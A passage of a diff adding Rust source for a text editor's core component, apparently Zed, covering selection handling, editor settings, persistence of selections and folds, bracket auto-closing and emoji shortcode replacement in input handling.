+ let placeholder_text = Some(placeholder_text.into()); + if self.placeholder_text != placeholder_text { + self.placeholder_text = placeholder_text; + cx.notify(); + } + } + + 
pub fn set_cursor_shape(&mut self, cursor_shape: CursorShape, cx: &mut Context) { + self.cursor_shape = cursor_shape; + + // Disrupt blink for immediate user feedback that the cursor shape has changed + self.blink_manager.update(cx, BlinkManager::show_cursor); + + cx.notify(); + } + + pub fn set_current_line_highlight( + &mut self, + current_line_highlight: Option, + ) { + self.current_line_highlight = current_line_highlight; + } + + pub fn set_collapse_matches(&mut self, collapse_matches: bool) { + self.collapse_matches = collapse_matches; + } + + fn register_buffers_with_language_servers(&mut self, cx: &mut Context) { + let buffers = self.buffer.read(cx).all_buffers(); + let Some(project) = self.project.as_ref() else { + return; + }; + project.update(cx, |project, cx| { + for buffer in buffers { + self.registered_buffers + .entry(buffer.read(cx).remote_id()) + .or_insert_with(|| project.register_buffer_with_language_servers(&buffer, cx)); + } + }) + } + + pub fn range_for_match(&self, range: &Range) -> Range { + if self.collapse_matches { + return range.start..range.start; + } + range.clone() + } + + pub fn set_clip_at_line_ends(&mut self, clip: bool, cx: &mut Context) { + if self.display_map.read(cx).clip_at_line_ends != clip { + self.display_map + .update(cx, |map, _| map.clip_at_line_ends = clip); + } + } + + pub fn set_input_enabled(&mut self, input_enabled: bool) { + self.input_enabled = input_enabled; + } + + pub fn set_inline_completions_hidden_for_vim_mode( + &mut self, + hidden: bool, + window: &mut Window, + cx: &mut Context, + ) { + if hidden != self.inline_completions_hidden_for_vim_mode { + self.inline_completions_hidden_for_vim_mode = hidden; + if hidden { + self.update_visible_inline_completion(window, cx); + } else { + self.refresh_inline_completion(true, false, window, cx); + } + } + } + + pub fn set_menu_inline_completions_policy(&mut self, value: MenuInlineCompletionsPolicy) { + self.menu_inline_completions_policy = value; + } + + pub fn 
set_autoindent(&mut self, autoindent: bool) { + if autoindent { + self.autoindent_mode = Some(AutoindentMode::EachLine); + } else { + self.autoindent_mode = None; + } + } + + pub fn read_only(&self, cx: &App) -> bool { + self.read_only || self.buffer.read(cx).read_only() + } + + pub fn set_read_only(&mut self, read_only: bool) { + self.read_only = read_only; + } + + pub fn set_use_autoclose(&mut self, autoclose: bool) { + self.use_autoclose = autoclose; + } + + pub fn set_use_auto_surround(&mut self, auto_surround: bool) { + self.use_auto_surround = auto_surround; + } + + pub fn set_auto_replace_emoji_shortcode(&mut self, auto_replace: bool) { + self.auto_replace_emoji_shortcode = auto_replace; + } + + pub fn toggle_edit_predictions( + &mut self, + _: &ToggleEditPrediction, + window: &mut Window, + cx: &mut Context, + ) { + if self.show_inline_completions_override.is_some() { + self.set_show_edit_predictions(None, window, cx); + } else { + let show_edit_predictions = !self.edit_predictions_enabled(); + self.set_show_edit_predictions(Some(show_edit_predictions), window, cx); + } + } + + pub fn set_show_edit_predictions( + &mut self, + show_edit_predictions: Option, + window: &mut Window, + cx: &mut Context, + ) { + self.show_inline_completions_override = show_edit_predictions; + self.update_edit_prediction_settings(cx); + + if let Some(false) = show_edit_predictions { + self.discard_inline_completion(false, cx); + } else { + self.refresh_inline_completion(false, true, window, cx); + } + } + + fn inline_completions_disabled_in_scope( + &self, + buffer: &Entity, + buffer_position: language::Anchor, + cx: &App, + ) -> bool { + let snapshot = buffer.read(cx).snapshot(); + let settings = snapshot.settings_at(buffer_position, cx); + + let Some(scope) = snapshot.language_scope_at(buffer_position) else { + return false; + }; + + scope.override_name().map_or(false, |scope_name| { + settings + .edit_predictions_disabled_in + .iter() + .any(|s| s == scope_name) + }) + } + + 
pub fn set_use_modal_editing(&mut self, to: bool) { + self.use_modal_editing = to; + } + + pub fn use_modal_editing(&self) -> bool { + self.use_modal_editing + } + + fn selections_did_change( + &mut self, + local: bool, + old_cursor_position: &Anchor, + show_completions: bool, + window: &mut Window, + cx: &mut Context, + ) { + window.invalidate_character_coordinates(); + + // Copy selections to primary selection buffer + #[cfg(any(target_os = "linux", target_os = "freebsd"))] + if local { + let selections = self.selections.all::(cx); + let buffer_handle = self.buffer.read(cx).read(cx); + + let mut text = String::new(); + for (index, selection) in selections.iter().enumerate() { + let text_for_selection = buffer_handle + .text_for_range(selection.start..selection.end) + .collect::(); + + text.push_str(&text_for_selection); + if index != selections.len() - 1 { + text.push('\n'); + } + } + + if !text.is_empty() { + cx.write_to_primary(ClipboardItem::new_string(text)); + } + } + + if self.focus_handle.is_focused(window) && self.leader_peer_id.is_none() { + self.buffer.update(cx, |buffer, cx| { + buffer.set_active_selections( + &self.selections.disjoint_anchors(), + self.selections.line_mode, + self.cursor_shape, + cx, + ) + }); + } + let display_map = self + .display_map + .update(cx, |display_map, cx| display_map.snapshot(cx)); + let buffer = &display_map.buffer_snapshot; + self.add_selections_state = None; + self.select_next_state = None; + self.select_prev_state = None; + self.select_syntax_node_history.try_clear(); + self.invalidate_autoclose_regions(&self.selections.disjoint_anchors(), buffer); + self.snippet_stack + .invalidate(&self.selections.disjoint_anchors(), buffer); + self.take_rename(false, window, cx); + + let new_cursor_position = self.selections.newest_anchor().head(); + + self.push_to_nav_history( + *old_cursor_position, + Some(new_cursor_position.to_point(buffer)), + false, + cx, + ); + + if local { + let new_cursor_position = 
self.selections.newest_anchor().head(); + let mut context_menu = self.context_menu.borrow_mut(); + let completion_menu = match context_menu.as_ref() { + Some(CodeContextMenu::Completions(menu)) => Some(menu), + _ => { + *context_menu = None; + None + } + }; + if let Some(buffer_id) = new_cursor_position.buffer_id { + if !self.registered_buffers.contains_key(&buffer_id) { + if let Some(project) = self.project.as_ref() { + project.update(cx, |project, cx| { + let Some(buffer) = self.buffer.read(cx).buffer(buffer_id) else { + return; + }; + self.registered_buffers.insert( + buffer_id, + project.register_buffer_with_language_servers(&buffer, cx), + ); + }) + } + } + } + + if let Some(completion_menu) = completion_menu { + let cursor_position = new_cursor_position.to_offset(buffer); + let (word_range, kind) = + buffer.surrounding_word(completion_menu.initial_position, true); + if kind == Some(CharKind::Word) + && word_range.to_inclusive().contains(&cursor_position) + { + let mut completion_menu = completion_menu.clone(); + drop(context_menu); + + let query = Self::completion_query(buffer, cursor_position); + cx.spawn(async move |this, cx| { + completion_menu + .filter(query.as_deref(), cx.background_executor().clone()) + .await; + + this.update(cx, |this, cx| { + let mut context_menu = this.context_menu.borrow_mut(); + let Some(CodeContextMenu::Completions(menu)) = context_menu.as_ref() + else { + return; + }; + + if menu.id > completion_menu.id { + return; + } + + *context_menu = Some(CodeContextMenu::Completions(completion_menu)); + drop(context_menu); + cx.notify(); + }) + }) + .detach(); + + if show_completions { + self.show_completions(&ShowCompletions { trigger: None }, window, cx); + } + } else { + drop(context_menu); + self.hide_context_menu(window, cx); + } + } else { + drop(context_menu); + } + + hide_hover(self, cx); + + if old_cursor_position.to_display_point(&display_map).row() + != new_cursor_position.to_display_point(&display_map).row() + { + 
self.available_code_actions.take(); + } + self.refresh_code_actions(window, cx); + self.refresh_document_highlights(cx); + self.refresh_selected_text_highlights(false, window, cx); + refresh_matching_bracket_highlights(self, window, cx); + self.update_visible_inline_completion(window, cx); + self.edit_prediction_requires_modifier_in_indent_conflict = true; + linked_editing_ranges::refresh_linked_ranges(self, window, cx); + self.inline_blame_popover.take(); + if self.git_blame_inline_enabled { + self.start_inline_blame_timer(window, cx); + } + } + + self.blink_manager.update(cx, BlinkManager::pause_blinking); + cx.emit(EditorEvent::SelectionsChanged { local }); + + let selections = &self.selections.disjoint; + if selections.len() == 1 { + cx.emit(SearchEvent::ActiveMatchChanged) + } + if local { + if let Some((_, _, buffer_snapshot)) = buffer.as_singleton() { + let inmemory_selections = selections + .iter() + .map(|s| { + text::ToPoint::to_point(&s.range().start.text_anchor, buffer_snapshot) + ..text::ToPoint::to_point(&s.range().end.text_anchor, buffer_snapshot) + }) + .collect(); + self.update_restoration_data(cx, |data| { + data.selections = inmemory_selections; + }); + + if WorkspaceSettings::get(None, cx).restore_on_startup + != RestoreOnStartupBehavior::None + { + if let Some(workspace_id) = + self.workspace.as_ref().and_then(|workspace| workspace.1) + { + let snapshot = self.buffer().read(cx).snapshot(cx); + let selections = selections.clone(); + let background_executor = cx.background_executor().clone(); + let editor_id = cx.entity().entity_id().as_u64() as ItemId; + self.serialize_selections = cx.background_spawn(async move { + background_executor.timer(SERIALIZATION_THROTTLE_TIME).await; + let db_selections = selections + .iter() + .map(|selection| { + ( + selection.start.to_offset(&snapshot), + selection.end.to_offset(&snapshot), + ) + }) + .collect(); + + DB.save_editor_selections(editor_id, workspace_id, db_selections) + .await + .with_context(|| 
format!("persisting editor selections for editor {editor_id}, workspace {workspace_id:?}")) + .log_err(); + }); + } + } + } + } + + cx.notify(); + } + + fn folds_did_change(&mut self, cx: &mut Context) { + use text::ToOffset as _; + use text::ToPoint as _; + + if WorkspaceSettings::get(None, cx).restore_on_startup == RestoreOnStartupBehavior::None { + return; + } + + let Some(singleton) = self.buffer().read(cx).as_singleton() else { + return; + }; + + let snapshot = singleton.read(cx).snapshot(); + let inmemory_folds = self.display_map.update(cx, |display_map, cx| { + let display_snapshot = display_map.snapshot(cx); + + display_snapshot + .folds_in_range(0..display_snapshot.buffer_snapshot.len()) + .map(|fold| { + fold.range.start.text_anchor.to_point(&snapshot) + ..fold.range.end.text_anchor.to_point(&snapshot) + }) + .collect() + }); + self.update_restoration_data(cx, |data| { + data.folds = inmemory_folds; + }); + + let Some(workspace_id) = self.workspace.as_ref().and_then(|workspace| workspace.1) else { + return; + }; + let background_executor = cx.background_executor().clone(); + let editor_id = cx.entity().entity_id().as_u64() as ItemId; + let db_folds = self.display_map.update(cx, |display_map, cx| { + display_map + .snapshot(cx) + .folds_in_range(0..snapshot.len()) + .map(|fold| { + ( + fold.range.start.text_anchor.to_offset(&snapshot), + fold.range.end.text_anchor.to_offset(&snapshot), + ) + }) + .collect() + }); + self.serialize_folds = cx.background_spawn(async move { + background_executor.timer(SERIALIZATION_THROTTLE_TIME).await; + DB.save_editor_folds(editor_id, workspace_id, db_folds) + .await + .with_context(|| { + format!( + "persisting editor folds for editor {editor_id}, workspace {workspace_id:?}" + ) + }) + .log_err(); + }); + } + + pub fn sync_selections( + &mut self, + other: Entity, + cx: &mut Context, + ) -> gpui::Subscription { + let other_selections = other.read(cx).selections.disjoint.to_vec(); + self.selections.change_with(cx, 
|selections| { + selections.select_anchors(other_selections); + }); + + let other_subscription = + cx.subscribe(&other, |this, other, other_evt, cx| match other_evt { + EditorEvent::SelectionsChanged { local: true } => { + let other_selections = other.read(cx).selections.disjoint.to_vec(); + if other_selections.is_empty() { + return; + } + this.selections.change_with(cx, |selections| { + selections.select_anchors(other_selections); + }); + } + _ => {} + }); + + let this_subscription = + cx.subscribe_self::(move |this, this_evt, cx| match this_evt { + EditorEvent::SelectionsChanged { local: true } => { + let these_selections = this.selections.disjoint.to_vec(); + if these_selections.is_empty() { + return; + } + other.update(cx, |other_editor, cx| { + other_editor.selections.change_with(cx, |selections| { + selections.select_anchors(these_selections); + }) + }); + } + _ => {} + }); + + Subscription::join(other_subscription, this_subscription) + } + + pub fn change_selections( + &mut self, + autoscroll: Option, + window: &mut Window, + cx: &mut Context, + change: impl FnOnce(&mut MutableSelectionsCollection<'_>) -> R, + ) -> R { + self.change_selections_inner(autoscroll, true, window, cx, change) + } + + fn change_selections_inner( + &mut self, + autoscroll: Option, + request_completions: bool, + window: &mut Window, + cx: &mut Context, + change: impl FnOnce(&mut MutableSelectionsCollection<'_>) -> R, + ) -> R { + let old_cursor_position = self.selections.newest_anchor().head(); + self.push_to_selection_history(); + + let (changed, result) = self.selections.change_with(cx, change); + + if changed { + if let Some(autoscroll) = autoscroll { + self.request_autoscroll(autoscroll, cx); + } + self.selections_did_change(true, &old_cursor_position, request_completions, window, cx); + + if self.should_open_signature_help_automatically( + &old_cursor_position, + self.signature_help_state.backspace_pressed(), + cx, + ) { + self.show_signature_help(&ShowSignatureHelp, window, 
cx); + } + self.signature_help_state.set_backspace_pressed(false); + } + + result + } + + pub fn edit(&mut self, edits: I, cx: &mut Context) + where + I: IntoIterator, T)>, + S: ToOffset, + T: Into>, + { + if self.read_only(cx) { + return; + } + + self.buffer + .update(cx, |buffer, cx| buffer.edit(edits, None, cx)); + } + + pub fn edit_with_autoindent(&mut self, edits: I, cx: &mut Context) + where + I: IntoIterator, T)>, + S: ToOffset, + T: Into>, + { + if self.read_only(cx) { + return; + } + + self.buffer.update(cx, |buffer, cx| { + buffer.edit(edits, self.autoindent_mode.clone(), cx) + }); + } + + pub fn edit_with_block_indent( + &mut self, + edits: I, + original_indent_columns: Vec>, + cx: &mut Context, + ) where + I: IntoIterator, T)>, + S: ToOffset, + T: Into>, + { + if self.read_only(cx) { + return; + } + + self.buffer.update(cx, |buffer, cx| { + buffer.edit( + edits, + Some(AutoindentMode::Block { + original_indent_columns, + }), + cx, + ) + }); + } + + fn select(&mut self, phase: SelectPhase, window: &mut Window, cx: &mut Context) { + self.hide_context_menu(window, cx); + + match phase { + SelectPhase::Begin { + position, + add, + click_count, + } => self.begin_selection(position, add, click_count, window, cx), + SelectPhase::BeginColumnar { + position, + goal_column, + reset, + } => self.begin_columnar_selection(position, goal_column, reset, window, cx), + SelectPhase::Extend { + position, + click_count, + } => self.extend_selection(position, click_count, window, cx), + SelectPhase::Update { + position, + goal_column, + scroll_delta, + } => self.update_selection(position, goal_column, scroll_delta, window, cx), + SelectPhase::End => self.end_selection(window, cx), + } + } + + fn extend_selection( + &mut self, + position: DisplayPoint, + click_count: usize, + window: &mut Window, + cx: &mut Context, + ) { + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let tail = self.selections.newest::(cx).tail(); + 
self.begin_selection(position, false, click_count, window, cx); + + let position = position.to_offset(&display_map, Bias::Left); + let tail_anchor = display_map.buffer_snapshot.anchor_before(tail); + + let mut pending_selection = self + .selections + .pending_anchor() + .expect("extend_selection not called with pending selection"); + if position >= tail { + pending_selection.start = tail_anchor; + } else { + pending_selection.end = tail_anchor; + pending_selection.reversed = true; + } + + let mut pending_mode = self.selections.pending_mode().unwrap(); + match &mut pending_mode { + SelectMode::Word(range) | SelectMode::Line(range) => *range = tail_anchor..tail_anchor, + _ => {} + } + + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.set_pending(pending_selection, pending_mode) + }); + } + + fn begin_selection( + &mut self, + position: DisplayPoint, + add: bool, + click_count: usize, + window: &mut Window, + cx: &mut Context, + ) { + if !self.focus_handle.is_focused(window) { + self.last_focused_descendant = None; + window.focus(&self.focus_handle); + } + + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let buffer = &display_map.buffer_snapshot; + let newest_selection = self.selections.newest_anchor().clone(); + let position = display_map.clip_point(position, Bias::Left); + + let start; + let end; + let mode; + let mut auto_scroll; + match click_count { + 1 => { + start = buffer.anchor_before(position.to_point(&display_map)); + end = start; + mode = SelectMode::Character; + auto_scroll = true; + } + 2 => { + let range = movement::surrounding_word(&display_map, position); + start = buffer.anchor_before(range.start.to_point(&display_map)); + end = buffer.anchor_before(range.end.to_point(&display_map)); + mode = SelectMode::Word(start..end); + auto_scroll = true; + } + 3 => { + let position = display_map + .clip_point(position, Bias::Left) + .to_point(&display_map); + let line_start = 
display_map.prev_line_boundary(position).0; + let next_line_start = buffer.clip_point( + display_map.next_line_boundary(position).0 + Point::new(1, 0), + Bias::Left, + ); + start = buffer.anchor_before(line_start); + end = buffer.anchor_before(next_line_start); + mode = SelectMode::Line(start..end); + auto_scroll = true; + } + _ => { + start = buffer.anchor_before(0); + end = buffer.anchor_before(buffer.len()); + mode = SelectMode::All; + auto_scroll = false; + } + } + auto_scroll &= EditorSettings::get_global(cx).autoscroll_on_clicks; + + let point_to_delete: Option = { + let selected_points: Vec> = + self.selections.disjoint_in_range(start..end, cx); + + if !add || click_count > 1 { + None + } else if !selected_points.is_empty() { + Some(selected_points[0].id) + } else { + let clicked_point_already_selected = + self.selections.disjoint.iter().find(|selection| { + selection.start.to_point(buffer) == start.to_point(buffer) + || selection.end.to_point(buffer) == end.to_point(buffer) + }); + + clicked_point_already_selected.map(|selection| selection.id) + } + }; + + let selections_count = self.selections.count(); + + self.change_selections(auto_scroll.then(Autoscroll::newest), window, cx, |s| { + if let Some(point_to_delete) = point_to_delete { + s.delete(point_to_delete); + + if selections_count == 1 { + s.set_pending_anchor_range(start..end, mode); + } + } else { + if !add { + s.clear_disjoint(); + } else if click_count > 1 { + s.delete(newest_selection.id) + } + + s.set_pending_anchor_range(start..end, mode); + } + }); + } + + fn begin_columnar_selection( + &mut self, + position: DisplayPoint, + goal_column: u32, + reset: bool, + window: &mut Window, + cx: &mut Context, + ) { + if !self.focus_handle.is_focused(window) { + self.last_focused_descendant = None; + window.focus(&self.focus_handle); + } + + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + + if reset { + let pointer_position = display_map + .buffer_snapshot + 
.anchor_before(position.to_point(&display_map)); + + self.change_selections(Some(Autoscroll::newest()), window, cx, |s| { + s.clear_disjoint(); + s.set_pending_anchor_range( + pointer_position..pointer_position, + SelectMode::Character, + ); + }); + } + + let tail = self.selections.newest::(cx).tail(); + self.columnar_selection_tail = Some(display_map.buffer_snapshot.anchor_before(tail)); + + if !reset { + self.select_columns( + tail.to_display_point(&display_map), + position, + goal_column, + &display_map, + window, + cx, + ); + } + } + + fn update_selection( + &mut self, + position: DisplayPoint, + goal_column: u32, + scroll_delta: gpui::Point, + window: &mut Window, + cx: &mut Context, + ) { + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + + if let Some(tail) = self.columnar_selection_tail.as_ref() { + let tail = tail.to_display_point(&display_map); + self.select_columns(tail, position, goal_column, &display_map, window, cx); + } else if let Some(mut pending) = self.selections.pending_anchor() { + let buffer = self.buffer.read(cx).snapshot(cx); + let head; + let tail; + let mode = self.selections.pending_mode().unwrap(); + match &mode { + SelectMode::Character => { + head = position.to_point(&display_map); + tail = pending.tail().to_point(&buffer); + } + SelectMode::Word(original_range) => { + let original_display_range = original_range.start.to_display_point(&display_map) + ..original_range.end.to_display_point(&display_map); + let original_buffer_range = original_display_range.start.to_point(&display_map) + ..original_display_range.end.to_point(&display_map); + if movement::is_inside_word(&display_map, position) + || original_display_range.contains(&position) + { + let word_range = movement::surrounding_word(&display_map, position); + if word_range.start < original_display_range.start { + head = word_range.start.to_point(&display_map); + } else { + head = word_range.end.to_point(&display_map); + } + } else { + head = 
position.to_point(&display_map); + } + + if head <= original_buffer_range.start { + tail = original_buffer_range.end; + } else { + tail = original_buffer_range.start; + } + } + SelectMode::Line(original_range) => { + let original_range = original_range.to_point(&display_map.buffer_snapshot); + + let position = display_map + .clip_point(position, Bias::Left) + .to_point(&display_map); + let line_start = display_map.prev_line_boundary(position).0; + let next_line_start = buffer.clip_point( + display_map.next_line_boundary(position).0 + Point::new(1, 0), + Bias::Left, + ); + + if line_start < original_range.start { + head = line_start + } else { + head = next_line_start + } + + if head <= original_range.start { + tail = original_range.end; + } else { + tail = original_range.start; + } + } + SelectMode::All => { + return; + } + }; + + if head < tail { + pending.start = buffer.anchor_before(head); + pending.end = buffer.anchor_before(tail); + pending.reversed = true; + } else { + pending.start = buffer.anchor_before(tail); + pending.end = buffer.anchor_before(head); + pending.reversed = false; + } + + self.change_selections(None, window, cx, |s| { + s.set_pending(pending, mode); + }); + } else { + log::error!("update_selection dispatched with no pending selection"); + return; + } + + self.apply_scroll_delta(scroll_delta, window, cx); + cx.notify(); + } + + fn end_selection(&mut self, window: &mut Window, cx: &mut Context) { + self.columnar_selection_tail.take(); + if self.selections.pending_anchor().is_some() { + let selections = self.selections.all::(cx); + self.change_selections(None, window, cx, |s| { + s.select(selections); + s.clear_pending(); + }); + } + } + + fn select_columns( + &mut self, + tail: DisplayPoint, + head: DisplayPoint, + goal_column: u32, + display_map: &DisplaySnapshot, + window: &mut Window, + cx: &mut Context, + ) { + let start_row = cmp::min(tail.row(), head.row()); + let end_row = cmp::max(tail.row(), head.row()); + let start_column = 
cmp::min(tail.column(), goal_column); + let end_column = cmp::max(tail.column(), goal_column); + let reversed = start_column < tail.column(); + + let selection_ranges = (start_row.0..=end_row.0) + .map(DisplayRow) + .filter_map(|row| { + if start_column <= display_map.line_len(row) && !display_map.is_block_line(row) { + let start = display_map + .clip_point(DisplayPoint::new(row, start_column), Bias::Left) + .to_point(display_map); + let end = display_map + .clip_point(DisplayPoint::new(row, end_column), Bias::Right) + .to_point(display_map); + if reversed { + Some(end..start) + } else { + Some(start..end) + } + } else { + None + } + }) + .collect::>(); + + self.change_selections(None, window, cx, |s| { + s.select_ranges(selection_ranges); + }); + cx.notify(); + } + + pub fn has_non_empty_selection(&self, cx: &mut App) -> bool { + self.selections + .all_adjusted(cx) + .iter() + .any(|selection| !selection.is_empty()) + } + + pub fn has_pending_nonempty_selection(&self) -> bool { + let pending_nonempty_selection = match self.selections.pending_anchor() { + Some(Selection { start, end, .. 
}) => start != end, + None => false, + }; + + pending_nonempty_selection + || (self.columnar_selection_tail.is_some() && self.selections.disjoint.len() > 1) + } + + pub fn has_pending_selection(&self) -> bool { + self.selections.pending_anchor().is_some() || self.columnar_selection_tail.is_some() + } + + pub fn cancel(&mut self, _: &Cancel, window: &mut Window, cx: &mut Context) { + self.selection_mark_mode = false; + + if self.clear_expanded_diff_hunks(cx) { + cx.notify(); + return; + } + if self.dismiss_menus_and_popups(true, window, cx) { + return; + } + + if self.mode.is_full() + && self.change_selections(Some(Autoscroll::fit()), window, cx, |s| s.try_cancel()) + { + return; + } + + cx.propagate(); + } + + pub fn dismiss_menus_and_popups( + &mut self, + is_user_requested: bool, + window: &mut Window, + cx: &mut Context, + ) -> bool { + if self.take_rename(false, window, cx).is_some() { + return true; + } + + if hide_hover(self, cx) { + return true; + } + + if self.hide_signature_help(cx, SignatureHelpHiddenBy::Escape) { + return true; + } + + if self.hide_context_menu(window, cx).is_some() { + return true; + } + + if self.mouse_context_menu.take().is_some() { + return true; + } + + if is_user_requested && self.discard_inline_completion(true, cx) { + return true; + } + + if self.snippet_stack.pop().is_some() { + return true; + } + + if self.mode.is_full() && matches!(self.active_diagnostics, ActiveDiagnostic::Group(_)) { + self.dismiss_diagnostics(cx); + return true; + } + + false + } + + fn linked_editing_ranges_for( + &self, + selection: Range, + cx: &App, + ) -> Option, Vec>>> { + if self.linked_edit_ranges.is_empty() { + return None; + } + let ((base_range, linked_ranges), buffer_snapshot, buffer) = + selection.end.buffer_id.and_then(|end_buffer_id| { + if selection.start.buffer_id != Some(end_buffer_id) { + return None; + } + let buffer = self.buffer.read(cx).buffer(end_buffer_id)?; + let snapshot = buffer.read(cx).snapshot(); + self.linked_edit_ranges + 
.get(end_buffer_id, selection.start..selection.end, &snapshot) + .map(|ranges| (ranges, snapshot, buffer)) + })?; + use text::ToOffset as TO; + // find offset from the start of current range to current cursor position + let start_byte_offset = TO::to_offset(&base_range.start, &buffer_snapshot); + + let start_offset = TO::to_offset(&selection.start, &buffer_snapshot); + let start_difference = start_offset - start_byte_offset; + let end_offset = TO::to_offset(&selection.end, &buffer_snapshot); + let end_difference = end_offset - start_byte_offset; + // Current range has associated linked ranges. + let mut linked_edits = HashMap::<_, Vec<_>>::default(); + for range in linked_ranges.iter() { + let start_offset = TO::to_offset(&range.start, &buffer_snapshot); + let end_offset = start_offset + end_difference; + let start_offset = start_offset + start_difference; + if start_offset > buffer_snapshot.len() || end_offset > buffer_snapshot.len() { + continue; + } + if self.selections.disjoint_anchor_ranges().any(|s| { + if s.start.buffer_id != selection.start.buffer_id + || s.end.buffer_id != selection.end.buffer_id + { + return false; + } + TO::to_offset(&s.start.text_anchor, &buffer_snapshot) <= end_offset + && TO::to_offset(&s.end.text_anchor, &buffer_snapshot) >= start_offset + }) { + continue; + } + let start = buffer_snapshot.anchor_after(start_offset); + let end = buffer_snapshot.anchor_after(end_offset); + linked_edits + .entry(buffer.clone()) + .or_default() + .push(start..end); + } + Some(linked_edits) + } + + pub fn handle_input(&mut self, text: &str, window: &mut Window, cx: &mut Context) { + let text: Arc = text.into(); + + if self.read_only(cx) { + return; + } + + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + + let selections = self.selections.all_adjusted(cx); + let mut bracket_inserted = false; + let mut edits = Vec::new(); + let mut linked_edits = HashMap::<_, Vec<_>>::default(); + let mut new_selections = 
Vec::with_capacity(selections.len()); + let mut new_autoclose_regions = Vec::new(); + let snapshot = self.buffer.read(cx).read(cx); + let mut clear_linked_edit_ranges = false; + + for (selection, autoclose_region) in + self.selections_with_autoclose_regions(selections, &snapshot) + { + if let Some(scope) = snapshot.language_scope_at(selection.head()) { + // Determine if the inserted text matches the opening or closing + // bracket of any of this language's bracket pairs. + let mut bracket_pair = None; + let mut is_bracket_pair_start = false; + let mut is_bracket_pair_end = false; + if !text.is_empty() { + let mut bracket_pair_matching_end = None; + // `text` can be empty when a user is using IME (e.g. Chinese Wubi Simplified) + // and they are removing the character that triggered IME popup. + for (pair, enabled) in scope.brackets() { + if !pair.close && !pair.surround { + continue; + } + + if enabled && pair.start.ends_with(text.as_ref()) { + let prefix_len = pair.start.len() - text.len(); + let preceding_text_matches_prefix = prefix_len == 0 + || (selection.start.column >= (prefix_len as u32) + && snapshot.contains_str_at( + Point::new( + selection.start.row, + selection.start.column - (prefix_len as u32), + ), + &pair.start[..prefix_len], + )); + if preceding_text_matches_prefix { + bracket_pair = Some(pair.clone()); + is_bracket_pair_start = true; + break; + } + } + if pair.end.as_str() == text.as_ref() && bracket_pair_matching_end.is_none() + { + // take first bracket pair matching end, but don't break in case a later bracket + // pair matches start + bracket_pair_matching_end = Some(pair.clone()); + } + } + if bracket_pair.is_none() && bracket_pair_matching_end.is_some() { + bracket_pair = Some(bracket_pair_matching_end.unwrap()); + is_bracket_pair_end = true; + } + } + + if let Some(bracket_pair) = bracket_pair { + let snapshot_settings = snapshot.language_settings_at(selection.start, cx); + let autoclose = self.use_autoclose && 
snapshot_settings.use_autoclose; + let auto_surround = + self.use_auto_surround && snapshot_settings.use_auto_surround; + if selection.is_empty() { + if is_bracket_pair_start { + // If the inserted text is a suffix of an opening bracket and the + // selection is preceded by the rest of the opening bracket, then + // insert the closing bracket. + let following_text_allows_autoclose = snapshot + .chars_at(selection.start) + .next() + .map_or(true, |c| scope.should_autoclose_before(c)); + + let preceding_text_allows_autoclose = selection.start.column == 0 + || snapshot.reversed_chars_at(selection.start).next().map_or( + true, + |c| { + bracket_pair.start != bracket_pair.end + || !snapshot + .char_classifier_at(selection.start) + .is_word(c) + }, + ); + + let is_closing_quote = if bracket_pair.end == bracket_pair.start + && bracket_pair.start.len() == 1 + { + let target = bracket_pair.start.chars().next().unwrap(); + let current_line_count = snapshot + .reversed_chars_at(selection.start) + .take_while(|&c| c != '\n') + .filter(|&c| c == target) + .count(); + current_line_count % 2 == 1 + } else { + false + }; + + if autoclose + && bracket_pair.close + && following_text_allows_autoclose + && preceding_text_allows_autoclose + && !is_closing_quote + { + let anchor = snapshot.anchor_before(selection.end); + new_selections.push((selection.map(|_| anchor), text.len())); + new_autoclose_regions.push(( + anchor, + text.len(), + selection.id, + bracket_pair.clone(), + )); + edits.push(( + selection.range(), + format!("{}{}", text, bracket_pair.end).into(), + )); + bracket_inserted = true; + continue; + } + } + + if let Some(region) = autoclose_region { + // If the selection is followed by an auto-inserted closing bracket, + // then don't insert that closing bracket again; just move the selection + // past the closing bracket. 
+ let should_skip = selection.end == region.range.end.to_point(&snapshot) + && text.as_ref() == region.pair.end.as_str(); + if should_skip { + let anchor = snapshot.anchor_after(selection.end); + new_selections + .push((selection.map(|_| anchor), region.pair.end.len())); + continue; + } + } + + let always_treat_brackets_as_autoclosed = snapshot + .language_settings_at(selection.start, cx) + .always_treat_brackets_as_autoclosed; + if always_treat_brackets_as_autoclosed + && is_bracket_pair_end + && snapshot.contains_str_at(selection.end, text.as_ref()) + { + // Otherwise, when `always_treat_brackets_as_autoclosed` is set to `true + // and the inserted text is a closing bracket and the selection is followed + // by the closing bracket then move the selection past the closing bracket. + let anchor = snapshot.anchor_after(selection.end); + new_selections.push((selection.map(|_| anchor), text.len())); + continue; + } + } + // If an opening bracket is 1 character long and is typed while + // text is selected, then surround that text with the bracket pair. 
+ else if auto_surround + && bracket_pair.surround + && is_bracket_pair_start + && bracket_pair.start.chars().count() == 1 + { + edits.push((selection.start..selection.start, text.clone())); + edits.push(( + selection.end..selection.end, + bracket_pair.end.as_str().into(), + )); + bracket_inserted = true; + new_selections.push(( + Selection { + id: selection.id, + start: snapshot.anchor_after(selection.start), + end: snapshot.anchor_before(selection.end), + reversed: selection.reversed, + goal: selection.goal, + }, + 0, + )); + continue; + } + } + } + + if self.auto_replace_emoji_shortcode + && selection.is_empty() + && text.as_ref().ends_with(':') + { + if let Some(possible_emoji_short_code) = + Self::find_possible_emoji_shortcode_at_position(&snapshot, selection.start) + { + if !possible_emoji_short_code.is_empty() { + if let Some(emoji) = emojis::get_by_shortcode(&possible_emoji_short_code) { + let emoji_shortcode_start = Point::new( + selection.start.row, + selection.start.column - possible_emoji_short_code.len() as u32 - 1, + ); + + // Remove shortcode from buffer + edits.push(( + emoji_shortcode_start..selection.start, + "".to_string().into(), + )); + new_selections.push(( + Selection { + id: selection.id, + start: snapshot.anchor_after(emoji_shortcode_start), + end: snapshot.anchor_before(selection.start), + reversed: selection.reversed, + goal: selection.goal, + }, + 0, + )); + + // Insert emoji + let selection_start_anchor = snapshot.anchor_after(selection.start); + new_selections.push((selection.map(|_| selection_start_anchor), 0)); + edits.push((selection.start..selection.end, emoji.to_string().into())); + + continue; + } + } + } + } + + // If not handling any auto-close operation, then just replace the selected + // text with the given input and move the selection to the end of the + // newly inserted text. 
